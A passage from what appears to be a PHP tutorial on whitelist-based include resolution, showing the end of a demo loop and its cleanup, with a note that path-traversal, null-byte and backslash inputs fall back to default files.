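    $file = resolve_include($req, $dir, $prefix, $suffix, $default);
    printf("%-45s -> %s\n", json_encode($req), basename($file));
}

// Remove the demo tree.
array_map('unlink', glob("$dir/*"));
rmdir($dir);
```

Only `German` selects a non-default file; the traversal, null-byte and backslash values match no key and fall back to `lang.English.php` or `config.inc.php`.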